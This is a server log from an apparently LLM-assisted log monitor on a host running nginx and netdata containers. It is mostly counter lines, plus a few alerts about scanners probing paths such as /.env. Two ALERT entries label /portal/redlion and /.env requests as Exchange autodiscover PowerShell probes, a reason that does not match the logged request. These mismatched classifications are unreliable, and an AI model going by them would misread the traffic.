2026/03/20 03:09:31.933698 [observer] Pipeline: processed=1100 pattern_hits=1079 llm_calls=21 llm_errors=0 learned=0 Mar 20 03:09:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:09:31.933726 [observer] Patterns: hash=1079 prefix=0 regex=0 contains=0 deny=2 alert=1 suppress=0 misses=21 Mar 20 03:10:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:10:01.938708 [observer] Pipeline: processed=1103 pattern_hits=1082 llm_calls=21 llm_errors=0 learned=0 Mar 20 03:10:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:10:01.938738 [observer] Patterns: hash=1082 prefix=0 regex=0 contains=0 deny=2 alert=1 suppress=0 misses=21 Mar 20 03:10:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:10:31.933680 [observer] Pipeline: processed=1106 pattern_hits=1085 llm_calls=21 llm_errors=0 learned=0 Mar 20 03:10:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:10:31.933703 [observer] Patterns: hash=1085 prefix=0 regex=0 contains=0 deny=2 alert=1 suppress=0 misses=21 Mar 20 03:11:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:11:01.947348 [observer] Pipeline: processed=1110 pattern_hits=1089 llm_calls=21 llm_errors=0 learned=0 Mar 20 03:11:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:11:01.947401 [observer] Patterns: hash=1089 prefix=0 regex=0 contains=0 deny=2 alert=1 suppress=0 misses=21 Mar 20 03:11:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:11:31.934924 [observer] Pipeline: processed=1114 pattern_hits=1093 llm_calls=21 llm_errors=0 learned=0 Mar 20 03:11:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:11:31.934950 [observer] Patterns: hash=1093 prefix=0 regex=0 contains=0 deny=2 alert=1 suppress=0 misses=21 Mar 20 03:12:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:12:01.953510 [observer] Pipeline: processed=1116 pattern_hits=1095 llm_calls=21 llm_errors=0 learned=0 Mar 20 03:12:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:12:01.953543 [observer] Patterns: hash=1095 prefix=0 regex=0 contains=0 deny=2 alert=1 suppress=0 
misses=21 Mar 20 03:12:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:12:31.935810 [observer] Pipeline: processed=1120 pattern_hits=1099 llm_calls=21 llm_errors=0 learned=0 Mar 20 03:12:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:12:31.935835 [observer] Patterns: hash=1099 prefix=0 regex=0 contains=0 deny=2 alert=1 suppress=0 misses=21 Mar 20 03:13:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:13:01.936825 [observer] Pipeline: processed=1122 pattern_hits=1101 llm_calls=21 llm_errors=0 learned=0 Mar 20 03:13:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:13:01.936852 [observer] Patterns: hash=1101 prefix=0 regex=0 contains=0 deny=2 alert=1 suppress=0 misses=21 Mar 20 03:13:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:13:31.934558 [observer] Pipeline: processed=1125 pattern_hits=1104 llm_calls=21 llm_errors=0 learned=0 Mar 20 03:13:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:13:31.934582 [observer] Patterns: hash=1104 prefix=0 regex=0 contains=0 deny=2 alert=1 suppress=0 misses=21 Mar 20 03:14:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:14:01.944480 [observer] Pipeline: processed=1128 pattern_hits=1107 llm_calls=21 llm_errors=0 learned=0 Mar 20 03:14:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:14:01.944507 [observer] Patterns: hash=1107 prefix=0 regex=0 contains=0 deny=2 alert=1 suppress=0 misses=21 Mar 20 03:14:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:14:31.948849 [observer] Pipeline: processed=1130 pattern_hits=1109 llm_calls=21 llm_errors=0 learned=0 Mar 20 03:14:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:14:31.948875 [observer] Patterns: hash=1109 prefix=0 regex=0 contains=0 deny=2 alert=1 suppress=0 misses=21 Mar 20 03:15:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:15:01.941724 [observer] Pipeline: processed=1134 pattern_hits=1113 llm_calls=21 llm_errors=0 learned=0 Mar 20 03:15:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:15:01.941839 [observer] Patterns: 
hash=1113 prefix=0 regex=0 contains=0 deny=2 alert=1 suppress=0 misses=21 Mar 20 03:15:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:15:31.944136 [observer] Pipeline: processed=1136 pattern_hits=1115 llm_calls=21 llm_errors=0 learned=0 Mar 20 03:15:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:15:31.944194 [observer] Patterns: hash=1115 prefix=0 regex=0 contains=0 deny=2 alert=1 suppress=0 misses=21 Mar 20 03:16:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:16:01.940886 [observer] Pipeline: processed=1142 pattern_hits=1121 llm_calls=21 llm_errors=0 learned=0 Mar 20 03:16:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:16:01.940940 [observer] Patterns: hash=1121 prefix=0 regex=0 contains=0 deny=2 alert=1 suppress=0 misses=21 Mar 20 03:16:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:16:31.944311 [observer] Pipeline: processed=1144 pattern_hits=1123 llm_calls=21 llm_errors=0 learned=0 Mar 20 03:16:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:16:31.944340 [observer] Patterns: hash=1123 prefix=0 regex=0 contains=0 deny=2 alert=1 suppress=0 misses=21 Mar 20 03:17:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:17:01.937546 [observer] Pipeline: processed=1147 pattern_hits=1126 llm_calls=21 llm_errors=0 learned=0 Mar 20 03:17:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:17:01.937573 [observer] Patterns: hash=1126 prefix=0 regex=0 contains=0 deny=2 alert=1 suppress=0 misses=21 Mar 20 03:17:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:17:31.937206 [observer] Pipeline: processed=1151 pattern_hits=1129 llm_calls=22 llm_errors=0 learned=0 Mar 20 03:17:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:17:31.937235 [observer] Patterns: hash=1129 prefix=0 regex=0 contains=0 deny=2 alert=1 suppress=0 misses=22 Mar 20 03:17:34 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:17:34.262840 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=suspicious confidence=0.65 action=alert 
pattern_type= Mar 20 03:17:34 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:17:34.262878 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=An nginx open() error indicates a missing file for a requested path, which is common in misconfigured routes or probing but not necessarily malicious by itself. Line=2026-03-20T03:17:28.378660570Z 2026/03/20 03:17:28 [error] 422#422: *744422 open() "/usr/share/nginx/default/portal/redlion" failed (2: No such file or directory), client: 20.65.226.8, server: _, requ... Mar 20 03:17:34 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:17:34.262964 [ALERT] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP request to /autodiscover/autodiscover.json?@zdi/Powershell with 404 indicates probing for Exchange/autodiscover PowerShell payload (common scanning behavior, seen with zgrab/automation). Line=2026-03-20T03:17:28.378741101Z 20.65.226.8 - - [20/Mar/2026:03:17:28 +0000] "54.200.221.0" "GET /portal/redlion HTTP/1.1" 404 2401 "-" "Mozilla/5.0 zgrab/0.x" "-" Mar 20 03:18:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:18:01.948863 [observer] Pipeline: processed=1154 pattern_hits=1132 llm_calls=22 llm_errors=0 learned=0 Mar 20 03:18:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:18:01.948894 [observer] Patterns: hash=1132 prefix=0 regex=0 contains=0 deny=3 alert=1 suppress=0 misses=22 Mar 20 03:18:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:18:31.934687 [observer] Pipeline: processed=1158 pattern_hits=1136 llm_calls=22 llm_errors=0 learned=0 Mar 20 03:18:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:18:31.934715 [observer] Patterns: hash=1136 prefix=0 regex=0 contains=0 deny=3 alert=1 suppress=0 misses=22 Mar 20 03:19:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:19:01.938361 [observer] Pipeline: processed=1160 pattern_hits=1138 llm_calls=22 llm_errors=0 learned=0 Mar 20 03:19:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:19:01.939090 [observer] 
Patterns: hash=1138 prefix=0 regex=0 contains=0 deny=3 alert=1 suppress=0 misses=22 Mar 20 03:19:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:19:31.935061 [observer] Pipeline: processed=1164 pattern_hits=1142 llm_calls=22 llm_errors=0 learned=0 Mar 20 03:19:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:19:31.935088 [observer] Patterns: hash=1142 prefix=0 regex=0 contains=0 deny=3 alert=1 suppress=0 misses=22 Mar 20 03:20:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:20:01.974298 [observer] Pipeline: processed=1166 pattern_hits=1144 llm_calls=22 llm_errors=0 learned=0 Mar 20 03:20:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:20:01.974331 [observer] Patterns: hash=1144 prefix=0 regex=0 contains=0 deny=3 alert=1 suppress=0 misses=22 Mar 20 03:20:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:20:31.934560 [observer] Pipeline: processed=1169 pattern_hits=1147 llm_calls=22 llm_errors=0 learned=0 Mar 20 03:20:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:20:31.934582 [observer] Patterns: hash=1147 prefix=0 regex=0 contains=0 deny=3 alert=1 suppress=0 misses=22 Mar 20 03:21:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:21:01.951573 [observer] Pipeline: processed=1174 pattern_hits=1152 llm_calls=22 llm_errors=0 learned=0 Mar 20 03:21:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:21:01.951603 [observer] Patterns: hash=1152 prefix=0 regex=0 contains=0 deny=3 alert=1 suppress=0 misses=22 Mar 20 03:21:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:21:31.950117 [observer] Pipeline: processed=1176 pattern_hits=1154 llm_calls=22 llm_errors=0 learned=0 Mar 20 03:21:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:21:31.950147 [observer] Patterns: hash=1154 prefix=0 regex=0 contains=0 deny=3 alert=1 suppress=0 misses=22 Mar 20 03:22:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:22:01.958277 [observer] Pipeline: processed=1180 pattern_hits=1158 llm_calls=22 llm_errors=0 learned=0 Mar 20 03:22:01 
ip-172-26-12-110 observer[1565011]: 2026/03/20 03:22:01.958305 [observer] Patterns: hash=1158 prefix=0 regex=0 contains=0 deny=3 alert=1 suppress=0 misses=22 Mar 20 03:22:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:22:31.940468 [observer] Pipeline: processed=1182 pattern_hits=1160 llm_calls=22 llm_errors=0 learned=0 Mar 20 03:22:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:22:31.940498 [observer] Patterns: hash=1160 prefix=0 regex=0 contains=0 deny=3 alert=1 suppress=0 misses=22 Mar 20 03:23:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:23:01.957718 [observer] Pipeline: processed=1186 pattern_hits=1164 llm_calls=22 llm_errors=0 learned=0 Mar 20 03:23:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:23:01.957751 [observer] Patterns: hash=1164 prefix=0 regex=0 contains=0 deny=3 alert=1 suppress=0 misses=22 Mar 20 03:23:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:23:31.933875 [observer] Pipeline: processed=1188 pattern_hits=1166 llm_calls=22 llm_errors=0 learned=0 Mar 20 03:23:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:23:31.933900 [observer] Patterns: hash=1166 prefix=0 regex=0 contains=0 deny=3 alert=1 suppress=0 misses=22 Mar 20 03:24:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:24:01.958038 [observer] Pipeline: processed=1191 pattern_hits=1169 llm_calls=22 llm_errors=0 learned=0 Mar 20 03:24:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:24:01.958076 [observer] Patterns: hash=1169 prefix=0 regex=0 contains=0 deny=3 alert=1 suppress=0 misses=22 Mar 20 03:24:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:24:31.940990 [observer] Pipeline: processed=1194 pattern_hits=1172 llm_calls=22 llm_errors=0 learned=0 Mar 20 03:24:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:24:31.941013 [observer] Patterns: hash=1172 prefix=0 regex=0 contains=0 deny=3 alert=1 suppress=0 misses=22 Mar 20 03:25:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:25:01.957453 [observer] Pipeline: processed=1196 
pattern_hits=1174 llm_calls=22 llm_errors=0 learned=0 Mar 20 03:25:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:25:01.957487 [observer] Patterns: hash=1174 prefix=0 regex=0 contains=0 deny=3 alert=1 suppress=0 misses=22 Mar 20 03:25:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:25:31.937074 [observer] Pipeline: processed=1200 pattern_hits=1178 llm_calls=22 llm_errors=0 learned=0 Mar 20 03:25:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:25:31.937103 [observer] Patterns: hash=1178 prefix=0 regex=0 contains=0 deny=3 alert=1 suppress=0 misses=22 Mar 20 03:26:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:26:01.958554 [observer] Pipeline: processed=1204 pattern_hits=1182 llm_calls=22 llm_errors=0 learned=0 Mar 20 03:26:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:26:01.958583 [observer] Patterns: hash=1182 prefix=0 regex=0 contains=0 deny=3 alert=1 suppress=0 misses=22 Mar 20 03:26:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:26:31.934010 [observer] Pipeline: processed=1208 pattern_hits=1186 llm_calls=22 llm_errors=0 learned=0 Mar 20 03:26:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:26:31.934032 [observer] Patterns: hash=1186 prefix=0 regex=0 contains=0 deny=3 alert=1 suppress=0 misses=22 Mar 20 03:27:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:27:01.947465 [observer] Pipeline: processed=1210 pattern_hits=1188 llm_calls=22 llm_errors=0 learned=0 Mar 20 03:27:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:27:01.947492 [observer] Patterns: hash=1188 prefix=0 regex=0 contains=0 deny=3 alert=1 suppress=0 misses=22 Mar 20 03:27:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:27:31.933533 [observer] Pipeline: processed=1212 pattern_hits=1190 llm_calls=22 llm_errors=0 learned=0 Mar 20 03:27:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:27:31.933562 [observer] Patterns: hash=1190 prefix=0 regex=0 contains=0 deny=3 alert=1 suppress=0 misses=22 Mar 20 03:28:01 ip-172-26-12-110 observer[1565011]: 
2026/03/20 03:28:01.993306 [observer] Pipeline: processed=1216 pattern_hits=1194 llm_calls=22 llm_errors=0 learned=0 Mar 20 03:28:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:28:01.993403 [observer] Patterns: hash=1194 prefix=0 regex=0 contains=0 deny=3 alert=1 suppress=0 misses=22 Mar 20 03:28:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:28:31.938034 [observer] Pipeline: processed=1218 pattern_hits=1196 llm_calls=22 llm_errors=0 learned=0 Mar 20 03:28:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:28:31.938059 [observer] Patterns: hash=1196 prefix=0 regex=0 contains=0 deny=3 alert=1 suppress=0 misses=22 Mar 20 03:29:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:29:01.949992 [observer] Pipeline: processed=1222 pattern_hits=1200 llm_calls=22 llm_errors=0 learned=0 Mar 20 03:29:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:29:01.950027 [observer] Patterns: hash=1200 prefix=0 regex=0 contains=0 deny=3 alert=1 suppress=0 misses=22 Mar 20 03:29:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:29:31.933790 [observer] Pipeline: processed=1224 pattern_hits=1202 llm_calls=22 llm_errors=0 learned=0 Mar 20 03:29:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:29:31.933812 [observer] Patterns: hash=1202 prefix=0 regex=0 contains=0 deny=3 alert=1 suppress=0 misses=22 Mar 20 03:30:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:30:01.939133 [observer] Pipeline: processed=1228 pattern_hits=1206 llm_calls=22 llm_errors=0 learned=0 Mar 20 03:30:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:30:01.939180 [observer] Patterns: hash=1206 prefix=0 regex=0 contains=0 deny=3 alert=1 suppress=0 misses=22 Mar 20 03:30:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:30:31.943284 [observer] Pipeline: processed=1230 pattern_hits=1208 llm_calls=22 llm_errors=0 learned=0 Mar 20 03:30:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:30:31.943306 [observer] Patterns: hash=1208 prefix=0 regex=0 contains=0 deny=3 alert=1 suppress=0 
misses=22 Mar 20 03:31:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:31:01.940069 [observer] Pipeline: processed=1234 pattern_hits=1212 llm_calls=22 llm_errors=0 learned=0 Mar 20 03:31:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:31:01.940097 [observer] Patterns: hash=1212 prefix=0 regex=0 contains=0 deny=3 alert=1 suppress=0 misses=22 Mar 20 03:31:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:31:31.934679 [observer] Pipeline: processed=1238 pattern_hits=1216 llm_calls=22 llm_errors=0 learned=0 Mar 20 03:31:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:31:31.934705 [observer] Patterns: hash=1216 prefix=0 regex=0 contains=0 deny=3 alert=1 suppress=0 misses=22 Mar 20 03:32:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:32:01.948811 [observer] Pipeline: processed=1240 pattern_hits=1218 llm_calls=22 llm_errors=0 learned=0 Mar 20 03:32:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:32:01.948841 [observer] Patterns: hash=1218 prefix=0 regex=0 contains=0 deny=3 alert=1 suppress=0 misses=22 Mar 20 03:32:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:32:31.936479 [observer] Pipeline: processed=1244 pattern_hits=1222 llm_calls=22 llm_errors=0 learned=0 Mar 20 03:32:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:32:31.936502 [observer] Patterns: hash=1222 prefix=0 regex=0 contains=0 deny=3 alert=1 suppress=0 misses=22 Mar 20 03:33:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:33:01.949035 [observer] Pipeline: processed=1246 pattern_hits=1224 llm_calls=22 llm_errors=0 learned=0 Mar 20 03:33:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:33:01.949067 [observer] Patterns: hash=1224 prefix=0 regex=0 contains=0 deny=3 alert=1 suppress=0 misses=22 Mar 20 03:33:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:33:31.933468 [observer] Pipeline: processed=1250 pattern_hits=1228 llm_calls=22 llm_errors=0 learned=0 Mar 20 03:33:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:33:31.933491 [observer] Patterns: 
hash=1228 prefix=0 regex=0 contains=0 deny=3 alert=1 suppress=0 misses=22 Mar 20 03:34:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:34:01.934663 [observer] Pipeline: processed=1252 pattern_hits=1230 llm_calls=22 llm_errors=0 learned=0 Mar 20 03:34:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:34:01.934690 [observer] Patterns: hash=1230 prefix=0 regex=0 contains=0 deny=3 alert=1 suppress=0 misses=22 Mar 20 03:34:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:34:31.952848 [observer] Pipeline: processed=1254 pattern_hits=1232 llm_calls=22 llm_errors=0 learned=0 Mar 20 03:34:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:34:31.952876 [observer] Patterns: hash=1232 prefix=0 regex=0 contains=0 deny=3 alert=1 suppress=0 misses=22 Mar 20 03:34:44 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:34:44.435839 [analyzer] LLM verdict for docker:captain-netdata-container: classification=safe confidence=0.75 action=allow pattern_type=prefix Mar 20 03:34:44 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:34:44.435878 [analyzer] Source hint mismatch: LLM says "tc-qos-helper.sh", actual is "captain-netdata-container" — skipping pattern Mar 20 03:34:48 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:34:48.916774 [analyzer] LLM verdict for docker:captain-netdata-container: classification=safe confidence=0.72 action=allow pattern_type=regex Mar 20 03:34:48 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:34:48.916818 [analyzer] Confidence 0.72 too low for pattern learning (need 0.85+) Mar 20 03:34:54 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:34:54.329093 [analyzer] LLM verdict for docker:captain-netdata-container: classification=suspicious confidence=0.65 action=alert pattern_type= Mar 20 03:34:54 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:34:54.329145 [SUSPICIOUS] Source=docker:captain-netdata-container Reason=Warning about missing configuration file can indicate misconfiguration or partial setup; not malicious but worth monitoring. 
Line=2026-03-20T03:34:39.574241203Z 2026-03-20 03:34:39: tc-qos-helper.sh: WARNING: Cannot find file '/etc/netdata/tc-qos-helper.conf'. Mar 20 03:35:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:35:01.952134 [observer] Pipeline: processed=1261 pattern_hits=1236 llm_calls=25 llm_errors=0 learned=0 Mar 20 03:35:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:35:01.952178 [observer] Patterns: hash=1236 prefix=0 regex=0 contains=0 deny=3 alert=1 suppress=0 misses=25 Mar 20 03:35:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:35:31.944787 [observer] Pipeline: processed=1263 pattern_hits=1238 llm_calls=25 llm_errors=0 learned=0 Mar 20 03:35:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:35:31.944815 [observer] Patterns: hash=1238 prefix=0 regex=0 contains=0 deny=3 alert=1 suppress=0 misses=25 Mar 20 03:36:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:36:01.941683 [observer] Pipeline: processed=1269 pattern_hits=1244 llm_calls=25 llm_errors=0 learned=0 Mar 20 03:36:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:36:01.941709 [observer] Patterns: hash=1244 prefix=0 regex=0 contains=0 deny=3 alert=1 suppress=0 misses=25 Mar 20 03:36:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:36:31.940818 [observer] Pipeline: processed=1271 pattern_hits=1246 llm_calls=25 llm_errors=0 learned=0 Mar 20 03:36:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:36:31.940848 [observer] Patterns: hash=1246 prefix=0 regex=0 contains=0 deny=3 alert=1 suppress=0 misses=25 Mar 20 03:37:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:37:01.942381 [observer] Pipeline: processed=1275 pattern_hits=1250 llm_calls=25 llm_errors=0 learned=0 Mar 20 03:37:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:37:01.942501 [observer] Patterns: hash=1250 prefix=0 regex=0 contains=0 deny=3 alert=1 suppress=0 misses=25 Mar 20 03:37:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:37:31.941054 [observer] Pipeline: processed=1277 pattern_hits=1252 llm_calls=25 
llm_errors=0 learned=0 Mar 20 03:37:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:37:31.941080 [observer] Patterns: hash=1252 prefix=0 regex=0 contains=0 deny=3 alert=1 suppress=0 misses=25 Mar 20 03:38:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:38:01.943806 [observer] Pipeline: processed=1279 pattern_hits=1254 llm_calls=25 llm_errors=0 learned=0 Mar 20 03:38:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:38:01.943837 [observer] Patterns: hash=1254 prefix=0 regex=0 contains=0 deny=3 alert=1 suppress=0 misses=25 Mar 20 03:38:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:38:31.938626 [observer] Pipeline: processed=1283 pattern_hits=1258 llm_calls=25 llm_errors=0 learned=0 Mar 20 03:38:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:38:31.938653 [observer] Patterns: hash=1258 prefix=0 regex=0 contains=0 deny=3 alert=1 suppress=0 misses=25 Mar 20 03:39:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:39:01.958806 [observer] Pipeline: processed=1285 pattern_hits=1260 llm_calls=25 llm_errors=0 learned=0 Mar 20 03:39:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:39:01.959640 [observer] Patterns: hash=1260 prefix=0 regex=0 contains=0 deny=3 alert=1 suppress=0 misses=25 Mar 20 03:39:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:39:31.933895 [observer] Pipeline: processed=1289 pattern_hits=1264 llm_calls=25 llm_errors=0 learned=0 Mar 20 03:39:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:39:31.933919 [observer] Patterns: hash=1264 prefix=0 regex=0 contains=0 deny=3 alert=1 suppress=0 misses=25 Mar 20 03:40:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:40:01.949474 [observer] Pipeline: processed=1291 pattern_hits=1266 llm_calls=25 llm_errors=0 learned=0 Mar 20 03:40:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:40:01.949503 [observer] Patterns: hash=1266 prefix=0 regex=0 contains=0 deny=3 alert=1 suppress=0 misses=25 Mar 20 03:40:04 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:40:04.790309 
[SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=An access attempt to a sensitive file (.env) via HTTP, which is a common probe for exposed configuration data. Line=2026-03-20T03:40:04.789994243Z 2026/03/20 03:40:04 [error] 422#422: *744634 open() "/usr/share/nginx/default/.env" failed (2: No such file or directory), client: 104.238.38.189, server: _, request: "G...
Mar 20 03:40:04 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:40:04.790382 [ALERT] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP request to /autodiscover/autodiscover.json?@zdi/Powershell with 404 indicates probing for Exchange/autodiscover PowerShell payload (common scanning behavior, seen with zgrab/automation). Line=2026-03-20T03:40:04.790006737Z 104.238.38.189 - - [20/Mar/2026:03:40:04 +0000] "54.200.221.0" "GET /.env HTTP/1.1" 404 2401 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, li...
Mar 20 03:40:05 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:40:05.671884 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP 405 on POST to root from an external IP suggests potential probing or misconfigured client attempting forbidden method; notable but not definitive threat. Line=2026-03-20T03:40:05.671582727Z 104.238.38.189 - - [20/Mar/2026:03:40:05 +0000] "54.200.221.0" "POST / HTTP/1.1" 405 552 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like G...
Mar 20 03:40:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:40:31.935140 [observer] Pipeline: processed=1298 pattern_hits=1273 llm_calls=25 llm_errors=0 learned=0 Mar 20 03:40:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:40:31.935264 [observer] Patterns: hash=1273 prefix=0 regex=0 contains=0 deny=4 alert=3 suppress=0 misses=25 Mar 20 03:41:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:41:01.959024 [observer] Pipeline: processed=1300 pattern_hits=1275 llm_calls=25 llm_errors=0 learned=0 Mar 20 03:41:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:41:01.959051 [observer] Patterns: hash=1275 prefix=0 regex=0 contains=0 deny=4 alert=3 suppress=0 misses=25 Mar 20 03:41:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:41:31.943449 [observer] Pipeline: processed=1304 pattern_hits=1279 llm_calls=25 llm_errors=0 learned=0 Mar 20 03:41:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:41:31.943476 [observer] Patterns: hash=1279 prefix=0 regex=0 contains=0 deny=4 alert=3 suppress=0 misses=25 Mar 20 03:42:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:42:01.947094 [observer] Pipeline: processed=1308 pattern_hits=1283 llm_calls=25 llm_errors=0 learned=0 Mar 20 03:42:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:42:01.947127 [observer] Patterns: hash=1283 prefix=0 regex=0 contains=0 deny=4 alert=3 suppress=0 misses=25 Mar 20 